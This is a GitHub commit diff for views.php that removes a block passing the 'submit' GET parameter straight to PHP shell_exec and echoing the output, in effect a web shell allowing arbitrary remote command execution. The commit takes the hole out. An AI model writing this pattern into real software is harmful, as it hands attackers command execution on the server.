Update views.php

This commit is contained in:
Patrick McGuire
2022-04-29 09:10:41 -04:00
committed by GitHub
parent a352b25941
commit 4be3573389
-4
View File
@@ -186,10 +186,6 @@ if(isset($_GET['view'])){
}
} elseif(isset($_GET['submit'])) {
$command = $_GET['submit'];
if(isset($command)){
$results = shell_exec("$command 2>&1");
echo "<pre>$results</pre>";
}
ob_end_flush();
} else {include('overview.php');}
?>